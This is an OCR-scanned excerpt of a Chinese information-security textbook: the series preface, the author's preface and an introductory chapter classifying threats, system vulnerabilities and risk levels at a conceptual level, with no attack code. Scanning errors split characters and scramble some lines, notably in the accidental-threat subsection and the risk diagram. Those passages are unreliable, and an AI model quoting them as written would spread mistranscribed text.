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出 版 说 明 


20 世纪 三 四 十 年 代 ,一 直 摸 索 着 前 进 的 计算 技术 与 刚 走 向 成 熟 的 电子 技术 结缘 。 这 一 
结合 ,不 仅 孕 育 了 新 一 代 计算 工具 一 一 电子 计算 机 ,还 产生 了 当时 谁 也 没有 料 到 的 巨大 效 
应 : 电子 计算 机 一 一 这 种 当初 为 计算 而 开发 出 来 的 工具 ,很 快 就 超出 计算 的 范畴 ,成 为 “ 信 
息 处 理 机 ”的 代名词 。 

信息 能 促成 管理 系统 的 优化 ,促进 组 织 创 新 ,绩效 不 断 上 升 ;信息 能 提高 计划 与 决策 的 
科学 性 和 及 时 性 ,是 信息 时 代 组 织 生存 ,发展 .竞争 制胜 的 有 力 武器 ;信息 能 革新 企业 内 部 的 
生产 力 要 素 结构 ,使 资源 转换 系统 的 生产 率 大 幅度 提高 ,并 同时 以 不 断 增加 的 柔性 适应 市 场 
需求 结构 和 消费 结构 的 快速 变化 。 

随 着 信息 技术 的 发 展 与 广泛 应 用 ,人 类 开始 能 够 高 效率 地 开发 并 利用 信息 ,信息 资源 对 
人 类 社会 的 作用 得 以 有 效 地 发 挥 ,并 逐步 超过 材料 和 能 源 成 为 人 类 社会 的 重要 支柱 ,信息 化 
成 为 一 个 时 代 的 口号 。 与 此 同时 ,信息 资源 开发 与 管理 人 才 越 来 越 广 受 社会 青睐 。 

信息 管理 与 信息 系统 专业 是 一 个 培养 信息 化 人 才 的 专业 ,是 一 个 培养 信息 资源 开发 与 
管理 方面 的 专门 人 才 的 专业 。 从 知识 结构 上 看 , 它 处 在 管理 学 、 信 息 科学 与 技术 和 有 关 专 业 
领域 的 交叉 点 上 。 它 对 技术 有 极 高 的 要 求 ,又 要 求 对 组 织 有 深刻 的 理解 ,对 行为 有 合理 的 组 
织 , 反 映 了 科学 与 人 本 融合 的 特点 。 这 种 交叉 与 融合 正 是 信息 管理 与 信息 系统 专业 最 重要 
的 特征 ,是 别 的 学 科 或 专业 难以 取代 和 涵盖 的 。 但 是 ,从 20 世纪 70 年 代 末 开始 创办 到 90 
年 代 初 ,尽管 国内 设 有 该 专业 的 院 校 已 经 上 升 到 150 多 所 ,但 还 没有 形成 很 好 反映 自己 特色 
的 一 个 教材 体系 。1991 年 全 国 10 所 院 校 的 信息 管理 专业 的 负责 人 在 太原 召开 第 一 次 研讨 
会 ,异口同声 地 谈 起 创建 一 套 符合 专业 需要 的 教材 体系 话题 。 此 后 ,经 过 1993 年 在 大 连 、 
1995 年 在 武汉 召开 的 会 议 ,又 有 更 多 的 院 校 加 入 到 了 这 一 研讨 之 中 。 这 些 研讨 活动 得 到 了 
国家 教委 有 关 部 门 的 赞许 和 支持 。 通 过 研讨 ,大 家 在 建设 具有 专业 特点 的 教材 体系 、 改 变 简 
单 照 搬 其 他 专业 教材 上 取得 了 共识 。1996 年 正式 启动 这 个 项 目 , 经 协商 由 张 基 温 教授 担任 
主编 ,由 魏 晴 宇 教授 、 陈 各 教授 担任 顾问 。 在 清华 大 学 出 版 社 的 大 力 支持 下 ,从 1997 年 起 这 
套 我 国信 息 管理 与 信息 系统 专业 的 第 一 套 系列 教材 陆续 问世 。 迄 今 已 经 10 年 多 ,当初 规划 
的 七 八 本 教材 已 经 扩展 到 30 多 本 ,形成 了 一 套 品种 多 样 .影响 面 广 的 系列 教材 ,不 仅 为 信息 
管理 和 信息 系统 专业 建设 做 出 了 贡献 ,而 且 也 被 许多 计算 机 专业 所 选用 。 这 些 都 是 编 委 会 
全 体 同 仁和 作者 .广大 使 用 本 系列 教材 的 师 生 以 及 出 版 社 的 编辑 们 辛勤 劳动 的 结果 。 

同时 ,我 们 也 欣喜 地 看 到 ,10 年 来 ,信息 管理 与 信息 系统 专业 也 有 了 较 大 的 发 展 ,不 仅 
其 规模 已 经 发 展 到 500 多 个 教学 点 ,而 且 随 着 信息 化 的 纵深 推进 , 随 着 电子 商务 、 电 子 政务 
和 企业 信息 化 的 发 展 ,专业 的 教学 内 容 也 与 时 俱 进 地 深化 和 更 新 ,从 过 去 的 围绕 信息 系统 分 
析 与 设计 ,已 经 延伸 到 信息 资源 的 开发 与 管理 ;专业 的 定位 也 逐步 明晰 , 即 为 信息 化 建设 与 
管理 培养 人 才 。 同 时 ,近年 来 围绕 提高 教学 质量 ,许多 学 校 开 展 了 精品 课程 建设 和 教材 建 
设 。 这 些 都 标志 这 个 专业 正在 走向 成 熟 。 


成 熟 的 专业 ,需要 优秀 教材 的 支持 。 为 此 ,我 们 将 重新 审视 并 陆续 修订 这 套 教材 。 在 这 
套 教材 问世 10 周年 之 际 , 我 们 再 一 次 表示 一 个 心愿 : 希望 与 全 国 的 同行 共勉 ,在 教材 和 专 
业 建 设 上 齐心 协力 ,做 出 更 大 贡献 。 我 们 将 在 原来 的 基础 上 ,重新 审视 ,不 断 补充 ,不 断 修 
改 , 不 断 完 善 。 对 于 它 的 任何 建设 性 意见 ,都 是 我 们 非常 期 盼 的 。 为 此 ,这 套 教材 将 具有 充 
分 的 开放 性 : 每 一 本 教材 都 是 一 个 原型 ,每 一 位 有 志 者 对 它 的 建设 性 意见 都 将 会 被 采纳 ,并 
享有 自己 的 知识 产权 ,以 使 它们 逐步 成 为 精品 。 


《高 等 院 校 信息 管理 与 信息 系统 专业 系列 教材 ) 编 委 会 
2007 年 1 月 28 日 


信息 系统 是 重要 的 ,重要 的 系统 会 导致 过 多 的 攻击 ,需要 特别 保护 。 信 息 系统 是 复杂 
的 ,复杂 的 系统 是 脆弱 的 ,脆弱 的 系统 需要 特别 保护 。 信 息 系统 具有 虚拟 性 ,虚拟 的 系统 给 
安全 保护 带 来 很 大 困难 。 现 代 信息 系统 是 开放 的 ,开放 的 系统 会 带 来 更 多 的 风险 。 

重要 、 风 险 、 虚 拟 和 困难 造就 了 信息 系统 安全 攻防 博弈 的 战场 ,也 加 速 了 信息 安全 技术 
和 管理 的 快速 发 展 ,使 得 信息 系统 安全 的 知识 体系 不 断 扩大 。 

本 书 围绕 防护 ,检测 、 响 应 和 恢复 ,把 有 关 信 息 系 统 安全 的 知识 按照 数据 保密 、 认 证 、 访 
问 控 制 、 系 统 攻 击 、 网 络 防护 和 信息 系统 安全 管理 的 结构 进行 组 织 。 在 内 容 的 选材 上 ,采取 
的 原则 是 :重点 内 容 详 细 介 绍 , 次 要 内 容 只 作 一 般 介绍 。 

本 书 每 章 后 都 配备 了 较 多 的 习题 。 这 些 习 题 有 不 同 的 类 型 ; 

。 有 些 要 思考 总结， 

。 有 些 要 进一步 理解 

。 有些 要 自己 想象 ; 

。 有些 是 要 自己 查找 资料 ; 

。 有些 要 动手 实验 。 

本 人 期 望 通过 这 些 习题 使 学 习 者 的 自学 能 力 和 动手 能 力 有 较 大 提高 。 

本 书 在 编写 过 程 中 参考 了 大 量 资料 。 这 些 资 料 有 的 引 自 国内 外 论文 ,有 的 引 自 其 他 著 
作 , 有 的 引 自 网 站 。 虽 本 人 尽心 在 参考 文献 中 予以 列 出 ,但 尚 有 许多 玻 漏 , 也 受 篇 幅 所 限 , 想 
不 能 一 一 列 出。 在 此 谨 向 有 关 作 者 致谢 并 表 歉 意 。 

在 编写 过 程 中 ,将 中 云 . 王 玉 斐 魏 土 婧 、 裴 浩 、 张 秋 菊 、 张 展 赫 、 戴 璐 等 人 参与 了 部 分 工 
作 ,并 制作 了 课件 。 

计算 机 信息 系统 安全 是 一 个 涉及 广泛 .发展 迅速 的 领域 。 尽 管 本 人 尽力 想 把 它 编写 好 ， 
但 客观 和 主观 的 能 力 所 限 ,实在 是 心 有 余 而 力 不 足 。 和 希望 读者 和 有 关 专 家 不 将 指正 ,以 便 适 
当 的 时 候 进 一 步 修 订 。 


张 基 温 
2006 年 8 月 18 日 
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第 0 章 引 论 
0.1 信息 系统 风险 


系统 风险 是 指 系统 遭受 意外 损失 的 可 能 性 , 它 主 要 来 自 系统 可 能 遭受 的 各 种 威胁 .系统 
本 身 的 脆弱 性 以 及 系统 对 于 威胁 的 失策 。 


0.1.1 信息 系统 及 其 重要 性 


人 类 社会 的 发 展 归根 结 底 是 人 类 知识 体系 的 发 展 和 基于 这 个 知识 体系 的 工具 的 进步 。 

人 们 对 于 信息 已 经 有 众多 的 解释 。 其 中 ,认识 论 把 信息 看 作 不 确定 性 的 减少 或 传递 中 
的 知识 差 (degree of knowledge) ,在 哲学 界 把 信息 与 有 序 度 联 系 起 来 。 因 此 可 以 说 ,信息 是 
以 传递 知识 差 的 形式 来 减少 不 确定 性 .增加 系统 有 序 度 的 资源 。 不 确定 性 的 减少 就 是 风险 
减少 。 从 这 点 上 看 ,信息 系统 就 是 一 种 减少 不 确定 性 和 减少 风险 的 工具 。 

从 生产 力 发 展 的 角度 看 ,人 类 社会 已 经 经 历 了 原始 社会 .农业 社会 和 工业 社会 ,现在 已 
经 近 人 了 信息 社会 。 这 4 种 社会 形态 是 人 类 社会 生产 力 的 3 次 飞跃 ,也 是 人 类 资源 开发 和 
使 用 从 弱 意 识 到 强 意识 的 3 次 飞跃 。 在 原始 社会 ,人 类 对 物质 、 能 源 及 信息 资源 的 开发 和 使 
用 都 处 于 弱 意 识 形 态 ,生产力 极为 低下 。 农 业 社会 的 到 来 是 人 类 强 意识 地 进行 物质 资源 开 
发 和 使 用 进步 的 结果 ,生产 力 有 了 较 大 提高 。 工 业 社会 的 到 来 是 人 类 在 强 意识 地 进行 能 源 
资源 开发 和 使 用 方面 的 一 次 飞跃 ,生产 力 有 了 进一步 提高 。 信 息 社会 的 到 来 是 人 类 强 意 识 
地 进行 信息 资源 开发 和 使 用 进步 的 一 次 飞跃 ,人 类 社会 生产 力 得 到 空前 提高 。 经 过 3 次 大 
的 经 济 转型 和 形态 变化 ,物质 .能 源 和 信息 作为 人 类 社会 三 大 基本 资源 的 认识 得 到 充分 确 
立 。 而 信息 资源 是 其 中 一 种 可 以 无 限 开发 的 和 能 动 的 资源 , 它 的 作用 日 益 显 著 , 目 前 已 经 成 
为 政治 、 经 济 竞 争 的 主要 领域 和 焦点 。 从 资源 的 角度 看 ,信息 系统 是 一 种 开发 信息 资源 的 工 
有 具 ,是 信息 以 及 用 于 信息 的 采集 ,传输 存储、 管理 ,检索 和 利用 等 工具 的 有 机 整体 。 

由 于 信息 作为 资源 和 减少 决策 风险 的 作用 ,使 得 信息 系统 成 为 竞争 力 的 重要 代表 ,也 使 
现代 社会 越 来 越 依赖 于 信息 系统 的 安全 运行 。 这 种 重要 性 也 使 信息 系统 成 为 竞争 对 手 攻击 
的 主要 目标 。 


0.1.2 信息 系统 安全 威胁 


信息 系统 安全 威胁 (thread) 是 指 对 于 信息 系统 的 组 成 要 素 及 其 功能 造成 某 种 损害 的 潜 
在 可 能 。 下 面 从 不 同 的 角度 介绍 对 于 信息 系统 安全 威胁 的 特征 。 


1. 按照 威胁 的 来 源 分 类 


按照 威胁 的 来 源 粗略 地 可 以 将 信息 系统 的 威胁 分 为 内 部 威胁 和 外 部 威胁 。 进 一 步 细 
分 ,信息 系统 的 威胁 大 致 有 如 下 一 些 。 


(1) 自然 灾害 威胁 
自然 灾害 是 不 以 人 的 意志 为 转移 的 一 些 自然 事件 ,如 地 震 、 台 风 、 雷 击 、 洪 涝 、 火 灾 等 。 


这 些 灾害 虽然 不 能 阻止 其 发 生 , 但 可 以 通过 技术 或 管理 手段 避免 或 降低 灾害 带 来 的 损失 。 


例如 


误 引 
命 周 


65% 


;采取 防 雷 ,防火 、 防 水 和 防 地 震 以 及 自然 灾害 预警 措施 等 。 

(2) 滥用 性 威胁 

意外 人 为 威胁 主要 由 系统 内 部 人 员 ( 设 计 人 员 、 操 作 人 员 ,管理 人 员 等 ) 的 操作 不 当 或 失 
起 。 这 种 威胁 的 发 生 是 偶然 的 ,但 却 是 时 有 发 生 的 ,并 且 存 在 于 信息 系统 开发 的 整个 生 
期 中 。 安 全 专家 经 过 长 期 调查 得 出 一 个 结论 : 无 论 是 私人 机 构 还 是 公共 机 构 , 大 约 
的 损失 是 由 于 无 意 的 错误 或 疏忽 所 造成 。 

(3) 有 意 人 为 威胁 

有 意 人 为 威胁 主要 来 自 两 种 情况 : 一 是 好 奇 心 人 为 威胁 ,一 是 敌意 性 人 为 威胁 。 前 者 


一 般 由 一 些 好 奇 心 强 者 实施 ,后 者 往往 是 由 竞争 对 手 ` 泄 愤 者 ,间谍 等 实施 。 


2. 按照 作用 对 象 分 类 


按照 所 作用 的 对 象 , 信 息 系 统 威胁 有 如 下 几 种 。 
(1) 针对 信息 的 威胁 
基于 信息 (资源 ) 的 威胁 是 指 偶然 地 或 故意 地 造成 信息 系统 中 信息 在 如 下 几 个 方面 的 


损失 : 


。 机 密 性 (confidentiality) : 数据 在 传输 或 存储 时 有 被 非法 截取 的 可 能 ,就 会 形成 机 密 
性 威胁 。 例 如 被 监听 、 被 分 析 等 。 提 高 信息 机 密 性 的 方法 有 数据 加 密 、 进 行 访问 控 
制 以 及 对 访问 者 进行 身份 验证 等 ,以 保证 数据 不 被 非 授 权 者 知晓 。 

。 完整 性 (integrity): 完整 性 威胁 是 指数 据 在 传输 或 存储 过 程 中 被 算 改 、 被 丢失 ,被 破 
坏 的 可 能 。 为 了 保护 数据 完整 性 ,可 以 进行 数据 的 完整 性 校 验 以 及 认证 等 ,可 以 发 
现 数据 是 否 被 算 改 ,进而 可 以 进行 数据 的 恢复 。 

。 可 用 性 (availability) : 指 保障 合法 用 户 正 常 使 用 信息 的 能 力 。 例 如 ,拒绝 访问 的 攻 
击 , 就 导致 了 合法 用 户 正 常 访问 信息 资源 的 能 力 丧 失 。 

。 真实 性 Cauthenticity): 真实 性 主要 是 指 接收 方 所 具有 的 辨认 假冒 和 抗拒 和 否认 的 
能 力 。 

因此 ,针对 信息 (资源 ) 的 威胁 可 以 归结 为 以 下 3 类 : 

。 信息 破坏 : 非法 取得 信息 的 使 用 权 ,删除 .修改 .插入 .恶意 添加 或 重 发 某 些 数据 , 以 
影响 正常 用 户 对 信息 的 正常 使 用 。 

。 信息 泄密 : 故意 或 偶然 地 非法 侦 收 、 截 获 . 分 析 某 些 信息 系统 中 的 信息 ,造成 系统 数 

。 假冒 或 否认 : 假冒 某 一 可 信任 方 进行 通信 或 者 对 发 送 的 数据 事后 予以 否认 。 

(2) 针对 系统 的 威胁 

针对 系统 的 威胁 包括 对 系统 硬件 的 威胁 .对 系统 软件 的 威胁 和 对 于 系统 使 用 者 的 威胁 。 

。 对 于 通信 线路 .计算 机 网 络 以 及 主机 光盘、 磁盘 等 的 盗窃 和 破坏 都 是 对 于 系统 硬件 
(实体 ) 的 威胁 。 


。 病毒 等 恶意 程序 是 对 系统 软件 的 威胁 ,流氓 软件 等 是 对 于 系统 访问 者 的 威胁 等 。 
*。 通过 旁 路 控制 , 躲 过 系统 的 认证 或 访问 控制 进行 未 授权 的 访问 等 。 
通过 对 系统 的 威胁 可 以 使 系统 运行 不 正常 或 准 痪 ,丧失 可 用 性 。 


3. 按照 方法 的 分 类 


对 于 信息 系统 的 威胁 有 许多 方法 或 手段 。 下 面 是 几 种 主要 的 威胁 方法 。 
(1) 信息 泄露 
信息 泄露 是 指 系统 的 敏感 数据 有 意 或 无 意 地 被 未 授权 者 知晓 。 信息 泄露 的 主要 途 
径 有 : 
。 在 传输 中 利用 电磁 辐射 或 搭 接线 路 的 方式 窃取 。 
。 授权 者 向 未 授权 者 泄露 ,例如 一 个 公司 职员 用 文件 名 传输 公司 的 秘密 文件 的 同时 ， 
对 文件 名 编码 ,使 公司 的 正常 秘密 文件 传输 信道 被 乱用 为 隐蔽 的 泄密 信道 。 
。 存储 设备 被 盗窃 或 盗用 。 
。 未 授权 者 利用 特定 的 工具 捕获 网 络 中 的 数据 流量 ` 流 向、 通行 频带 、 数 据 长 度 等 数据 
并 进行 分 析 , 从 中 获取 敏感 信息 。 
(2) 扫描 (scan) 
扫描 是 利用 特定 的 软件 工具 向 目标 发 送 特制 的 数据 包 , 对 响应 进行 分 析 , 以 了 解 目 标 网 
络 或 主机 的 特征 。 
(3) 入 侵 (intrusion) 
入侵 即 非 授权 访问 ,是 指 没 有 经 过 授权 (同意 ) 就 获得 系统 的 访问 权限 或 特权 ,对 系统 进行 
非 正 常 访问 ,或 擅自 扩大 访问 权限 越权 访问 系统 信息 。 主 要 的 非 授 权 访问 形式 有 如 下 几 种 。 
。 旁 路 控制 : 攻击 者 利用 系统 漏洞 绕 过 系统 的 访问 控制 而 渗入 系统 内 部 。 
。 假冒 : 某 个 未 经 授权 的 实体 通过 出 示 伪 造 的 凭证 骗取 某 个 系统 的 信任 ,非法 取得 系 
统 访问 权 或 得 到 额外 的 特权 。 
。 口令 破解 : 利用 专门 的 工具 穷 举 或 猜测 用 户口 令 。 
。 合法 用 户 的 非 授权 访问 : 合法 用 户 进 入 系统 后 擅自 扩大 访问 权限 或 越权 访问 。 
(4) 拒绝 服务 (denial of service,DoS) 
DoS 指 系统 可 用 性 因 服 务 中 断 而 遭 到 破坏 。DoS 攻击 常常 通过 用 户 进 程 消耗 过 多 的 系 
统 资源 造成 系统 阻塞 或 瘫痪 。 
(5) 抵赖 (否认 ) 
通信 一 方 由 于 某 种 原因 而 实施 的 下 列 行为 都 称 为 抵赖 : 
。 发 方 事后 否认 自己 曾经 发 送 过 某 些 消息 ， 
。 收 方 事后 否认 自己 曾经 收 到 过 某 些 消息 ; 
。 发 方 事后 否认 自己 曾经 发 送 过 某 些 消息 的 内 容 ; 
。 收 方 事后 否认 自己 曾经 收 到 过 某 些 消息 的 内 容 。 
(6) 滥用 (misuse) 
滥用 泛 指 一 切 对 信息 系统 产生 不 良 影响 的 活动 。 主 要 内 容 如 下 。 
。 传播 恶意 代码 : 恶意 代码 是 一 些 对 于 系统 有 副作用 的 代码 。 它 们 或 者 独立 存在 (如 
过 海 -可 


蠕虫 ) 或 者 依附 于 其 他 程序 (如 病毒 ,特洛伊 木马 .逻辑 炸弹 等 ) ,进行 大 量 复制 消耗 
系统 资源 或 进行 删除 .修改 等 破坏 性 操作 ,或 执行 窃取 敏感 数据 的 任务 。 

。 复制 / 重 放 : 攻击 者 为 了 达到 混淆 视听 、 扰 乱 系统 的 目的 ,常常 先 记 录 系 统 中 的 合法 
信息 ,然后 在 适当 的 时 候 复制 重 放 ,使 系统 难 辨 真 伪 。 例 如 ,C 实体 截获 了 B 实体 发 
往 A 实体 的 订单 ,然后 重复 地 向 A 发 送 复 制 的 订单 ,使 得 A 的 工作 出 现 混 乱 。 

。 发 布 或 传播 不 良 信息 ,如 发 布 垃圾 邮件 ,传播 包括 色情 、 上 暴力、 毒品、 邪教 .赌博 等 内 
容 的 信息 。 


0.1.3 信息 系统 安全 的 脆弱 性 


1. 信息 系统 脆弱 性 的 根源 


信息 系统 的 脆弱 性 (vulnerability) 是 指 从 自身 分 析 信 息 系统 被 威胁 而 出 现 异常 的 各 种 
根源 和 因素 。 脆 弱 性 导致 系统 呈现 一 些 薄 弱 环节 或 漏洞 。 任 何 威胁 都 是 因为 系统 本 身 具有 
薄弱 环节 或 漏洞 才 形 成 或 出 现 的 。 信 息 系统 的 脆弱 性 根源 很 多 ,下 面 是 一 些 主要 方面 。 

(1) 基于 信息 属性 的 本 源 性 脆弱 

区 别 于 物质 和 能 量 , 信 息 具 有 依附 性 、 多 质 性 、 非 消耗 性 、 可 共享 性 (可 重用 性 ) 、 易 伪 性 、 
聚变 性 和 增殖 性 。 在 研究 信息 系统 的 安全 时 ,主要 关注 信息 的 依附 性 ,多 质 性 、 易 复制 性 和 
易 伪 性 。 对 于 现代 信息 系统 来 说 ,信息 往往 以 数字 形式 传输 和 保存 。 这 种 虚拟 性 使 得 信息 
系统 更 易 被 复制 ,更 易 被 改变 。 

(2) 基于 系统 复杂 性 的 结构 性 脆弱 

人 类 信息 系统 是 随 着 人 类 的 出 现 就 出 现 了 。 而 它 的 发 展 水 平 是 随 着 科学 技术 的 进步 而 
不 断 提 高 的 ,是 随 着 人 类 对 信息 资源 的 需求 不 断 增长 而 进步 的 。 穴 石 记 事 、 结 绳 记事 ,文字 
纸张 .算盘 .计算 器 烽火. 电报、 电话、 计算 机 、 网 络 都 是 人 类 信息 工具 的 阶段 性 产物 ,是 不 同 
时 期 信息 系统 的 重要 组 成 要 素 。 可 以 看 出 ,由 于 信息 系统 在 社会 生活 中 的 地 位 越 来 越 重要 ， 
人 们 总 是 不 断 用 最 先进 的 技术 武装 它 。 同 时 ,为 了 使 它 的 功能 不 断 强 大 ,还 采用 了 综合 性 技 
术 , 其 中 主要 是 信息 处 理 技术 和 信息 传输 技术 。 这 些 技术 综合 性 应 用 的 结果 是 ,使 信息 系统 
不 断 趋 于 复杂 。 

信息 系统 除了 技术 上 的 复杂 性 外 ,功能 的 扩充 和 需求 的 扩展 ,使 其 规模 也 越 来 越 大 。 这 
就 是 人 们 常 说 的 80% 的 人 只 使 用 其 中 20% 的 功能 。 

一 般 来 说 ,系统 规模 越 大 、 越 复杂 ,设计 ,建造 和 管理 的 难度 就 越 大 ,所 包含 的 漏洞 就 越 
多 ,系统 就 越 脆弱 。 例 如 ,一 个 Windows 操作 系统 ,尽管 推出 已 经 有 十 几 年 之 久 , 但 其 漏洞 
还 是 不 断 被 发 现 。 

信息 系统 安全 是 一 个 多 种 要 素 的 复杂 集成 ,是 一 种 “互动 关联 性 "很 强 的 安全 。 按 照 木 
桶 原理 ,整体 的 脆弱 性 等 于 最 薄弱 处 和 最 薄弱 时 刻 的 脆弱 性 ,只 要 有 一 处 存在 安全 隐患 , 系 
统 就 存在 安全 隐患 ;只 要 有 1% 的 不 安全 ,就 等 于 100% 的 不 安全 ;只 要 某 个 时 刻 表现 出 脆 
弱 ,系统 就 是 全 程 的 脆弱 。 

(3) 基于 攻防 不 对 称 性 的 普通 性 脆弱 

在 这 个 充满 竞争 的 世界 里 ,攻击 与 防御 相伴 而 生 并 且 永 不 会 完结 。 不 过 ,防御 往往 要 比 

4 。 


攻击 付出 更 多 的 代价 ,因为 : 
。 攻击 可 以 在 任意 时 刻 发 起 ,防御 必须 随时 警惕 ; 
。 攻击 可 以 选择 一 个 薄弱 点 进行 ,防御 必须 全 线 设防 ; 
攻击 包含 了 对 未 知 缺 陷 的 探测 ,防御 只 能 对 已 知 的 攻击 防御 ; 
攻击 常 在 暗 处 ,具有 隐蔽 性 ;防御 常 在 明 处 ,表面 看 起 来 完美 ,使 人 容易 玻 忽 , 丧 失 


警世 


。 攻击 可 以 肆意 进行 ,防御 必须 遵循 一 定 的 规则 。 

信息 系统 在 社会 中 的 重要 地 位 导致 它 不 断 受 到 花样 翻新 的 攻击 。 而 威胁 和 脆弱 性 是 一 
个 相对 的 概念 。 攻 与 防 之 间 的 严重 不 对 称 导致 了 系统 脆弱 性 的 上 升 , 增 加 了 防御 的 难度 和 
成 本 。 同 时 ,在 攻击 与 防御 相互 博弈 中 ,信息 系统 的 安全 成 为 一 个 动态 的 概念 ,因而 不 可 能 
一 劳 永 逸 地 解决 。 

(4) 基于 网 络 的 开放 和 数据 库 共享 的 应 用 性 脆弱 

现代 信息 系统 是 基于 信息 处 理 和 信息 传输 技术 的 。 现 代 信息 处 理 的 重要 支撑 技术 是 数 
据 库 技术 ,现代 通信 技术 的 支撑 是 电磁 通信 和 计算 机 网 络 。 而 数据 库 的 共享 性 .电磁 通信 的 
易 攻 击 性 和 计算 机 网 络 的 开放 性 ,都 使 信息 系统 显得 非常 脆弱 。 


2. 信息 系统 脆弱 性 的 表现 


信息 系统 的 脆弱 性 表现 为 安全 漏洞 (也 称 bug)。 如 前 所 述 ,计算 机 的 安全 漏洞 是 全 方 
位 的 ,也 是 动态 的 。 下 面 介 绍 几 个 主要 的 方面 。 
(1) 芯片 的 脆弱 性 
安全 漏洞 不 仅 存 在 于 软件 之 中 ,还 存在 于 硬件 之 中 ,特别 是 芯片 中 。1997 年 法 新 社 在 
一 篇 报道 中 就 引用 了 Intel 公司 发 言 人 汤姆 。 沃 尔 德 的 一 段 话 :“ 我 们 已 经 确认 奔腾 和 具有 
多 媒体 扩展 (MMX) 技 术 的 奔腾 处 理 器 芯片 存在 一 处 新 的 缺陷 *。 这 个 缺陷 导致 当 操作 者 
取得 特权 发 出 一 个 特殊 指令 时 ,系统 将 会 死机 。 
(2) 操作 系统 安全 漏洞 
操作 系统 是 对 计算 机 系统 的 软 硬 件 资源 进行 管理 ,控制 的 大 型 综合 软件 ,是 计算 机 系统 
运行 的 基础 ,操作 系统 的 不 安全 是 计算 机 系统 不 安全 的 重要 原因 。 根据 国际 权威 组 织 
SANS 和 FBI 于 2003 年 公布 的 安全 漏洞 报告 ,在 Internet 的 安全 漏洞 中 , 排 在 前 20 名 的 几 
乎 都 是 操作 系统 的 漏洞 。 
从 理论 上 说 ,任何 实际 运行 的 操作 系统 都 会 有 各 自 的 漏洞 。 下 面 列 举 操 作 系统 的 脆弱 
性 的 一 些 共 性 方面 : 
。 后 门 式 漏洞 。 后 门 或 称 陷 门 (trap doors) 是 一 种 操作 系统 的 无 口令 入 口 ,由 一 段 程 
序 实现 ,通常 是 系统 开发 者 为 调试 、 测 试 、 维 修 而 设置 的 简便 入 口 。 例 如 ,在 特定 的 
时 间 按 下 特定 的 键 或 提供 特定 的 参数 ,就 会 对 预定 的 事件 或 事件 序列 产生 非 授权 的 
影响 。 后 门 的 发 现 是 非常 困难 的 。 因 此 ,攻击 者 常 控 空心 思 地 设计 后 门 , 形 成 隐蔽 
的 信道 监视 系统 运行 或 伺机 对 系统 发 起 攻击 。 例 如 ,操作 系统 提供 的 调试 器 (de- 
bug)“ 向 导 ”(wizard) 以 及 daemon 软件 ,都 有 可 能 被 攻击 者 利用 而 进入 系统 。 
。“ 补 丁 ? 式 漏洞 。 操 作 系 统 支持 动态 连接 。 因 此 ,操作 系统 才 可 以 动态 地 安装 1/O 驱 
冯 


动 程序 和 其 他 系统 服务 ,也 才能 通过 打 “ 补 丁 ” 的 方式 修补 安全 漏洞 。 当 然 , 也 就 为 
攻击 者 提供 了 用 打 “ 补 丁 ” 的 方式 来 破坏 系统 。 
远程 创建 进程 式 漏洞 。 操 作 系 统 允许 远程 进程 的 创建 和 激活 。 由 于 被 创建 的 进程 
可 以 继承 创建 进程 的 权力 ,就 为 攻击 者 在 远程 安装 攻击 软件 提供 了 可 能 。 例 如 , 攻 
击 者 可 以 在 远程 把 “补丁 ” 打 在 一 个 特权 用 户 上 ,使 用 这 种 特权 对 系统 进行 攻击 。 
(3) 数据 库 的 安全 脆弱 性 
当前 数据 库 系 统 设计 时 主要 考虑 的 内 容 是 数据 的 共享 性 一致 性 、 完 整 性 和 访问 的 可 控 
制 性 ,对 于 安全 的 考虑 较 少 。 这 使 数据 库 系统 表现 得 比较 脆弱 。 例 如 : 
。 数 据 库 中 存放 着 大 量 数据 。 这 些 数据 的 重要 性 、 机 密 性 各 不 相同 ,而 它们 却 要 被 不 
同 职责 和 权力 的 用 户 共享 ,这 是 十 分 不 安全 的 。 
。 数据 库 数据 的 共享 性 可 能 导致 一 个 用 户 对 数据 的 修改 影响 了 其 他 用 户 的 正常 使 用 。 
。 数据 库 一 般 不 保存 历史 数据 ,一 个 数据 被 修改 , 旧 值 就 被 破坏 。 
。 联 机 数据 库 可 以 被 多 用 户 共享 ,可 能 会 因 多 个 用 户 操 作 而 使 数据 的 完整 性 破坏 。 
(4) 计算 机 网 络 的 安全 脆弱 性 
计算 机 网 络 是 通信 技术 与 计算 机 技术 相 结合 的 产物 , 它 的 脆弱 性 主要 表现 在 如 下 几 个 
方面 : 
。 传输 中 的 脆弱 性 ,如 电磁 辐射 . 串 音 干扰 、 线 路 窃听 等 。 
。 网 络 体系 结构 的 开放 性 脆弱 。 一 个 计算 机 网 络 要 连接 多 个 用 户 ,这 本 身 就 是 一 个 
不 安全 因素 。 特 别 是 对 于 目前 已 经 普遍 使 用 的 TCP/IP 来 说 ,由 于 当初 主要 考虑 
的 是 网 络 互 联 和 传输 的 效率 问题 ,没有 很 好 地 解决 安全 问题 ,所 以 安全 的 薄弱 环 
节 较 多 。 
。 网 络 服务 的 安全 脆弱 性 。 例 如 Web 服务 .FTP 服务 、 电 子 邮 件 服务 .DNS 服务 .路 
由 服务 .TELNET 服务 等 都 分 别 存在 自己 的 漏洞 或 安全 问题 。 


0.1.4 风险 = 脆弱 性 十 威胁 

风险 与 系统 本 身 的 脆弱 性 (漏洞 ) 的 高 低 和 外 部 威胁 的 高 低 有 关 。 也 就 是 说 ,风险 是 威 
胁 和 漏洞 的 综合 结果 。 图 0. 1 表明 了 这 种 关系 : 风险 一 威 
胁 十 脆弱 性 , 即 没有 威胁 ,就 不 会 有 风险 。 同 样 , 没 有 脆弱 
性 ,也 不 会 有 风险 。 


对 威胁 和 脆弱 性 进行 综合 ,可 以 将 风险 分 为 低 、 中 、 高 等 风险 
3 个 级 别 。 
(1) 低 风 险 。 当 系统 具有 较 低 的 脆弱 性 或 者 面临 较 低 
的 威胁 时 ,其 安全 将 处 于 低 风险 级 别 。 低 高 


脆弱 性 (漏洞 ) 
(2) 中 等 风险 。 当 系统 具有 中 等 的 脆弱 性 或 者 面临 中 
| 0. 全 与 - 的 
等 的 威胁 时 ,其 安全 将 处 于 中 等 风险 级 别 。 人 
(3) 高 风险 。 当 系统 具有 较 高 的 脆弱 性 并 且 面 临 较 高 的 威胁 时 ,其 安全 将 处 于 高 风险 
级 别 。 


0.2 信息 系统 安全 概念 


安全 是 相对 于 危险 的 。 或 者 说 ,安全 是 免 于 危险 的 一 种 状态 。 有 人 进一步 将 其 解释 为 
“客观 上 不 存在 威胁 ,主观 上 不 存在 恐惧 ”。 反 过 来 说 ,如 果 "* 客 观 上 存在 威胁 ,主观 上 存在 恐 
惧 ” 就 是 不 安全 的 。 

